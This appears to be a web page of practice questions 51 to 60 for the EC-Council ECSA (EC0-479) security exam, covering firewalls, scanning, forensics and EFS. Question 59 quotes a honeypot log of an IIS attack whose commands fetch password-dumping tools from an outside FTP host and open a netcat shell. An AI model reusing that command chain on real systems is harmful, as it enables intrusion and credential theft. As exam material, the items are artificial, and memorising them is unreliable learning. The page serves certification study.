New Year Special 60% Discount Offer - Ends in 0d 00h 00m 00s - Coupon code: bestdeal

Free ECCouncil EC0-479 Practice Exam with Questions & Answers | Set: 6

Questions 51

In Linux, what is the smallest possible shellcode?

Options:
A.

800 bytes

B.

8 bytes

C.

80 bytes

D.

24 bytes

ECCouncil EC0-479 Premium Access
Questions 52

How many possible sequence number combinations are there in TCP/IP protocol?

Options:
A.

320 billion

B.

32 million

C.

4 billion

D.

1 billion

Questions 53

You are running through a series of tests on your network to check for any security vulnerabilities. After normal working hours, you initiate a DoS attack against your external firewall. The firewall quickly freezes up and becomes unusable. You then initiate an FTP connection from an external IP into your internal network. The connection is successful even though you have FTP blocked at the external firewall. What has happened?

Options:
A.

The firewall failed-open

B.

The firewall failed-bypass

C.

The firewall failed-closed

D.

The firewall ACL has been purged

Questions 54

Frank is working on a vulnerability assessment for a company on the West coast. The company hired Frank to assess its network security through scanning, pen tests, and vulnerability assessments. After discovering numerous known vulnerabilities detected by a temporary IDS he set up, he notices a number of items that show up as unknown but questionable in the logs. He looks up the behavior on the Internet, but cannot find anything related. What organization should Frank submit the log to find out if it is a new vulnerability or not?

Options:
A.

CVE

B.

IANA

C.

RIPE

D.

APIPA

Questions 55

John is using Firewalk to test the security of his Cisco PIX firewall. He is also utilizing a sniffer located on a subnet that resides deep inside his network. After analyzing the sniffer log files, he does not see any of the traffic produced by Firewalk. Why is that?

Options:
A.

Firewalk sets all packets with a TTL of zero

B.

Firewalk cannot pass through Cisco firewalls

C.

Firewalk sets all packets with a TTL of one

D.

Firewalk cannot be detected by network sniffers

Questions 56

Jessica works as systems administrator for a large electronics firm. She wants to scan her network quickly to detect live hosts by using ICMP ECHO Requests. What type of scan is Jessica going to perform?

Options:
A.

Ping trace

B.

Tracert

C.

Smurf scan

D.

ICMP ping sweep

Questions 57

You are using DriveSpy, a forensic tool and want to copy 150 sectors where the starting sector is 1709 on the primary hard drive. Which of the following formats correctly specifies these sectors?

Options:
A.

0:1000, 150

B.

0:1709, 150

C.

1:1709, 150

D.

0:1709-1858

Questions 58

In the context of file deletion process, which of the following statement holds true?

Options:
A.

When files are deleted, the data is overwritten and the cluster marked as available

B.

The longer a disk is inuse, the less likely it is that deleted files will be overwritten

C.

While booting, the machine may create temporary files that can delete evidence

D.

Secure delete programs work by completely overwriting the file in one go

Questions 59

The following excerpt is taken from a honeypot log that was hosted at laB. wiretrip.net. Snort reported Unicode attacks from 213.116.251.162. The File Permission Canonicalization vulnerability (UNICODE attack) allows scripts to be run in arbitrary folders that do not normally have the right to run scripts. The attacker tries a Unicode attack and eventually succeeds in displaying boot.ini. He then switches to playing with RDS, via msadcs.dll. The RDS vulnerability allows a malicious user to construct SQL statements that will execute shell commands (such as CMD. EXE) on the IIS server. He does a quick query to discover that the directory exists, and a query to msadcs.dll shows that it is functioning correctly. The attacker makes a RDS query which results in the commands run as shown below.

“cmd1.exe /c open 213.116.251.162 >ftpcom”

“cmd1.exe /c echo johna2k >>ftpcom”

“cmd1.exe /c echo

haxedj00 >>ftpcom”

“cmd1.exe /c echo get n

C.

exe >>ftpcom”

“cmd1.exe /c echo get pdump.exe >>ftpcom”

“cmd1.exe /c echo get samdump.dll >>ftpcom”

“cmd1.exe /c echo quit >>ftpcom”

“cmd1.exe /c ftp-

s:ftpcom”

“cmd1.exe /c nc

-l -p 6969 -

e cmd1.exe”

What can you infer from the exploit given?

Options:
A.

It is a local exploit where the attacker logs in using username johna2k

B.

There are two attackers on the system -johna2k and haxedj00

C.

The attack is a remote exploit and the hacker downloads three files

D.

The attacker is unsuccessful in spawning a shell as he has specified a high end UDP port

Questions 60

An Employee is suspected of stealing proprietary information belonging to your company that he had no rights to possess. The information was stored on the Employees Computer that was protected with the NTFS Encrypted File System (EFS) and you had observed him copy the files to a floppy disk just before leaving work for the weekenD. You detain the Employee before he leaves the building and recover the floppy disks and secure his computer. Will you be able to break the encryption so that you can verify that that the employee was in possession of the proprietary information?

Options:
A.

EFS uses a 128- bit key that can‟t be cracked, so you will not be able to recover the information

B.

When the encrypted file was copied to the floppy disk, it was automatically unencrypted, so you can recover the information

C.

The EFS Revoked Key Agent can be used on the Computer to recover the information

D.

When the Encrypted file was copied to the floppy disk, the EFS private key was also copied to the floppy disk, so you can recover the information.

Exam Code: EC0-479
Certification Provider: ECCouncil
Exam Name: EC-Council Certified Security Analyst (ECSA)
Last Update: Feb 6, 2025
Questions: 232